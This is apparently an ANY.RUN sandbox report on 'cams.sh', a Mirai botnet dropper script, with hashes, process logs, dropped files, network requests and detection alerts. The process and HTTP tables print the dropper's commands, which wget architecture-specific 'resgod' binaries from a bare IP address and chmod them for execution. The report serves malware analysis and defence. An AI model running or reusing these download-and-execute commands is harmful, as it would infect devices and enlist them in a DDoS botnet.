Malware analysis cams.sh Malicious activity | ANY.RUN

Add for printing

File name:	cams.sh
Full analysis:	https://app.any.run/tasks/a4ac7490-7993-4063-ba80-1d7b76fe13b6
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	April 07, 2025, 05:33:36
OS:	Ubuntu 22.04.2
Tags:	mirai botnet
Indicators:
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	60D2AF76BD0A4007AF85A9ED1AFB621C
SHA1:	D5C7AA40E0DD0C23E373AE0C384CB506A8CAE429
SHA256:	EFC1E5AE9F8D5DB5D38404BE7575B078A69E4B8C5334E9247052966C37800C58
SSDEEP:	12:YuAa0edhAEUMOe28NItAxMDItY2iAYKDPdwVAf/H+T4AeYXebSDAyS2b0w:yPiNIyVYK7cNBKScySSd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- MIRAI has been detected (SURICATA)
  - wget (PID: 39530)
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 39496)
- Uses wget to download content
  - bash (PID: 39500)
- Executes commands using command-line interpreter
  - sudo (PID: 39499)
- Potential Corporate Privacy Violation
  - wget (PID: 39502)
  - wget (PID: 39507)
  - wget (PID: 39522)
  - wget (PID: 39526)
  - wget (PID: 39530)
  - wget (PID: 39538)
- Connects to the server without a host name
  - wget (PID: 39507)
  - wget (PID: 39534)
  - wget (PID: 39526)
  - wget (PID: 39530)
  - wget (PID: 39538)
- Connects to unusual port
  - resgod.x86 (PID: 39542)
INFO
- Checks timezone
  - wget (PID: 39502)
  - wget (PID: 39507)
  - wget (PID: 39522)
  - wget (PID: 39530)
  - wget (PID: 39534)
  - wget (PID: 39526)
  - wget (PID: 39538)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

258

Monitored processes

40

Malicious processes

3

Suspicious processes

2

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
39495	/bin/sh -c "sudo chown user /tmp/cams\.sh && chmod +x /tmp/cams\.sh && DISPLAY=:0 sudo -iu user /tmp/cams\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN Exit code: 0
39496	sudo chown user /tmp/cams.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
39497	chown user /tmp/cams.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
39498	chmod +x /tmp/cams.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
39499	sudo -iu user /tmp/cams.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
39500	-bash --login -c \/tmp\/cams\.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
39501	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
39502	wget http://104.168.101.27/resgod.arm	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0
39503	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 0
39504	chmod 777 resgod.arm	/usr/bin/chmod	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0

Add for printing

Executable files

0

Suspicious files

7

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
39502	wget	/home/user/resgod.arm		o
		MD5:—	SHA256:—
39507	wget	/home/user/resgod.arm5		binary
		MD5:—	SHA256:—
39522	wget	/home/user/resgod.arm6		binary
		MD5:—	SHA256:—
39526	wget	/home/user/resgod.arm7		binary
		MD5:—	SHA256:—
39530	wget	/home/user/resgod.mips		binary
		MD5:—	SHA256:—
39534	wget	/home/user/resgod.mpsl		binary
		MD5:—	SHA256:—
39538	wget	/home/user/resgod.x86		binary
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

8

TCP/UDP connections

18

DNS requests

10

Threats

16

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	185.125.190.17:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
39502	wget	GET	200	104.168.101.27:80	http://104.168.101.27/resgod.arm	unknown	—	—	unknown
39507	wget	GET	200	104.168.101.27:80	http://104.168.101.27/resgod.arm5	unknown	—	—	unknown
39522	wget	GET	200	104.168.101.27:80	http://104.168.101.27/resgod.arm6	unknown	—	—	unknown
39530	wget	GET	200	104.168.101.27:80	http://104.168.101.27/resgod.mips	unknown	—	—	unknown
39534	wget	GET	200	104.168.101.27:80	http://104.168.101.27/resgod.mpsl	unknown	—	—	unknown
39526	wget	GET	200	104.168.101.27:80	http://104.168.101.27/resgod.arm7	unknown	—	—	unknown
39538	wget	GET	200	104.168.101.27:80	http://104.168.101.27/resgod.x86	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.190.97:80	—	Canonical Group Limited	GB	unknown
—	—	185.125.190.17:80	—	Canonical Group Limited	GB	unknown
—	—	37.19.194.81:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
512	snapd	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
39502	wget	104.168.101.27:80	—	AS-COLOCROSSING	US	unknown
39507	wget	104.168.101.27:80	—	AS-COLOCROSSING	US	unknown
39522	wget	104.168.101.27:80	—	AS-COLOCROSSING	US	unknown
39526	wget	104.168.101.27:80	—	AS-COLOCROSSING	US	unknown
39530	wget	104.168.101.27:80	—	AS-COLOCROSSING	US	unknown

DNS requests

Domain	IP	Reputation
google.com	142.250.186.78 2a00:1450:4001:812::200e	whitelisted
odrs.gnome.org	37.19.194.81 169.150.255.183 195.181.175.41 212.102.56.178 169.150.255.180 207.211.211.27 195.181.170.18 2a02:6ea0:c700::19 2a02:6ea0:c700::21 2a02:6ea0:c700::112 2a02:6ea0:c700::18 2a02:6ea0:c700::11 2a02:6ea0:c700::107 2a02:6ea0:c700::101	whitelisted
api.snapcraft.io	185.125.188.54 185.125.188.58 185.125.188.59 185.125.188.55 2620:2d:4000:1010::6d 2620:2d:4000:1010::42 2620:2d:4000:1010::117 2620:2d:4000:1010::344	whitelisted
13.100.168.192.in-addr.arpa	—	unknown
connectivity-check.ubuntu.com	2620:2d:4002:1::196 2620:2d:4000:1::98 2620:2d:4002:1::197 2620:2d:4000:1::2b 2001:67c:1562::24 2620:2d:4000:1::96 2620:2d:4000:1::97 2620:2d:4000:1::2a 2620:2d:4000:1::22 2001:67c:1562::23 2620:2d:4000:1::23 2620:2d:4002:1::198	whitelisted

Threats

PID	Process	Class	Message
39502	wget	Potentially Bad Traffic	ET INFO ARM File Download Request from IP Address
39502	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39507	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File
39507	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39522	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File
39526	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File
39526	wget	Potentially Bad Traffic	ET INFO ARM7 File Download Request from IP Address
39522	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39530	wget	A Network Trojan was detected	AV INFO Possible Mirai .mips Executable Download
39526	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

cams.sh

60D2AF76BD0A4007AF85A9ED1AFB621C

D5C7AA40E0DD0C23E373AE0C384CB506A8CAE429

EFC1E5AE9F8D5DB5D38404BE7575B078A69E4B8C5334E9247052966C37800C58

12:YuAa0edhAEUMOe28NItAxMDItY2iAYKDPdwVAf/H+T4AeYXebSDAyS2b0w:yPiNIyVYK7cNBKScySSd

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MIRAI has been detected (SURICATA)

SUSPICIOUS

Modifies file or directory owner

Uses wget to download content

Executes commands using command-line interpreter

Potential Corporate Privacy Violation

Connects to the server without a host name

Connects to unusual port

INFO

Checks timezone

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings